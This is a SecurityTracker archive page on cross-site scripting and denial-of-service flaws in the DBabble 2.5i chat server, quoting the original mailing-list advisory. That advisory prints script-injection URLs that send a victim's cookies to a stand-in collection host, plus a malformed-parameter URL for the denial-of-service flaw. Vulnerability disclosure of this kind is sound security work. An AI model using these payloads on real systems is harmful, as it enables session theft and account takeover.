SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Instant Messaging/IRC/Chat)  >   DBabble Vendors:   NetWin
DBabble Chat Server Input Validation Flaws Permit Remote Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1007700
SecurityTracker URL:  http://securitytracker.com/id/1007700
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 14 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 2.5i
Description:   Some input validation vulnerabilities were reported in the DBabble chat server. A remote user can conduct cross-site scripting attacks.

Dr_insane reported that the software does not filter HTML code from user-supplied input before displaying the input. As a result, a remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the DBabble software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[HOST]:8132/dbabble?cmd=[XSS ATTACK]
http://[HOST]:8132/dbabble?[XSS ATTACK]
http://[HOST]:8132/dbabble?cmd=cmd_newuser&lang=English&template=Standard (Fields name,password and Display name are vulnerable to XSS ATTACK)

It is also reported that the software does not properly validate the 'display' variable values, which may cause denial of service conditions. The nature of the denial of service conditions was not disclosed. A demonstration exploit URL was provided:

http:[HOST]/dbabble?tok=1_1_840327879_1094951187&cmd=u_friends_del&hid=1&uid=3&display=WHATEVER!!!!

The vendor has reportedly been notified.
Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the DBabble server software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.netwinsite.com/dbabble/index.htm (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (AIX), UNIX (FreeBSD), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Sun, 14 Sep 2003 05:03:00 +0300
Subject:  [0day] DBabble 2.5i- Instant Messaging for the office XSS/Cookie


-
*first published on: http://members.lycos.co.uk/r34ct/

-----------------------------------------------------------------------------
----------------
DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory

-----------------------------------------------------------------------------
-----------------------------------------

DBabble 2.5i XSS/Cookie Problem
12/09/2003
-by dr_insane (dr_insane@pathfinder.gr)
-http://members.lycos.co.uk/r34ct/


-------------------
Vendor Information:
-------------------
Homepage: http://www.netwinsite.com/
Vendor informed
Vender Response : None (yet?)


-------------------
Affected  Versions/systems:
-------------------
(Version 2.5i is vulnerable. Older versions may be vulnerable too)

Dbabble Solaris (Sparc) 
Dbabble Linux libc6/redhat 5/6
Dbabble Free BSD 
Dbabble MacOS X
Dbabble Freebsd
Dbabble AIX
Dbabble Windows NT/2000/XP/95/98/ME

NO VULNERABLE VERSIONS
- ?
-------------------
Description:
-------------------
DBabble is a chat, discussion, and instant messaging server and client, which allows 
users to send encrypted instant messages, have private conversations, and create and 
participate in private or public chat rooms and discussions. Users communicate with the 
chat server using either a web browser, or a client for Windows 95/98/ME/NT/2000/XP. 
Users can communicate with ICQ, MSN, Yahoo, and AIM (AOL) users, send instant messages to 
groups of users, receive email copies of their instant messages or new discussion group 
articles, and they can send and receive instant messaging from email addresses and mobile 
phones. Discussion groups/forums can optionally be linked to external usenet (NNTP) 
groups and/or made available to NNTP clients. A single DBabble chat server can support 
thousands of simultaneous online users and can optionally be isolated from outside 
communication.

I encountered XSS security holes in some scripts of Dbabble 2.5i and some other problems.


-----------------------------
Vulnerable Scripts/Exploit:
--------------------------------------------
(1)

http://[HOST]:8132/dbabble?cmd=[XSS ATTACK]
http://[HOST]:8132/dbabble?[XSS ATTACK] 
http://[HOST]:8132/dbabble?cmd=cmd_newuser&lang=English&template=Standard (Fields 
name,password and Display name are vulnerable to XSS ATTACK)

Another problem is that Dbabble uses cookies. So it is possible for someone to steal them 
using  XSS
attacks and some javascript.

Examples:

http://[HOST]/dbabble?cmd="><script>document.location='
http://www.yourhost.org/cgi-bin/cookie.cgi?
'%20+document.cookie</script>

http://[HOST]/dbabble?cmd=<script>document.location='
http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>

http://[HOST]/dbabble?cmd=><script>document.location='
http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>

These are the examples of "evil" Javascript . These Javascript examples gather
the users cookie and then send a request to the yourhost.org website with the cookie in the
query .

When you access a hostile link with a xss attack in those scripts youur 
browser will execute the script commands.
This can be use for steal cookies , authentication tokens and other 
private information.
If your browser is vulnerable to other holes ( like MSIE ;-) you can 
have more problems...


(2)
Another problem is that the parametre 'display' doesn't check the values it can accept. This 
can
lead to DOS attacks and other problems.

http:[HOST]
/dbabble?tok=1_1_840327879_1094951187&cmd=u_friends_del&hid=1&uid=3&display=W
HATEVER!!!!



-----------------
| SoLuTiOnS |
-----------------

Update to the next Version:>

-----------
| CONTACT |
-----------

Dr_insane
dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/
Greece



______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones! 
http://www.pathfinder.gr - Δωρεάν mail από τον Pathfinder!

_______________________________________________
0day mailing list
0day@nothackers.org
http://nothackers.org/mailman/listinfo/0day


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC